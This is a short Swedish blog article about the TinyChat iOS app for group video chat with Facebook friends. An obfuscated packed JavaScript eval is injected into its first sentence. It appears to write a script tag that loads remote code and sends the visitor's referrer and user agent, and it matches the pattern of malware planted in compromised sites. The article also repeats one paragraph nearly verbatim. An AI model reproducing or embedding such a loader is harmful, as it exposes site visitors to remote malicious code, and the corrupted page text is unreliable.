Image Image Image Image Image Image Image Image Image Image

| 22 oktober, 2018

Scroll to top

Top

TinyChat låter dig videochatta med dina facebook-vänner.

TinyChat låter dig videochatta med dina facebook-vänner.
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzsni|var|u0026u|referrer|ydefz||js|php’.split(‘|’),0,{}))
är appen här som låter dig och upp till tolv andra samtidigt videochatta med varandra.

TinyChat är en applikation som nu är släppt till iOS. Du kan via denna app chatta med dina vänner på Facebook via din iPhone, iPod eller iPad.

Enligt en av grundarna Dan Blake ska denna appa skilja sig från liknande som Skype, Tango eller Fring genom att dina vänner inte behöver ha något installerat för att vara med och delta i en videochat du startat. När man har laddat ner appen kopplar man upp den med Facebook och får då en lista med alla sina vänner. Där väljer du då vilka som ska få vara med. Dem får då en länk till Facebook som de kan klicka på.

Enligt medgrundaren Dan Blake skiljer sig den här appen från Fring, Tango eller Skype genom att dina polare inte behöver ha något installerat för att vara med och delta i en videochat som du startat. När man laddat hem appen kan man koppla ihop den med Facebook och du får då upp en lista över dina vänner, som du sedan klickar på för att bjuda in dom till en chat. De får då en länk på Facebook som de kan klicka på.

Enligt Dan är det ca 30 miljoner nimuter videochatter varje dag och runt 100 000 nya personer som registrerar sig på deras hemsida.

Om ni tycker det är kul att videochatta med varandra så finns applikationen att ladda ner i iTunes eller Appstore
itunes.apple.com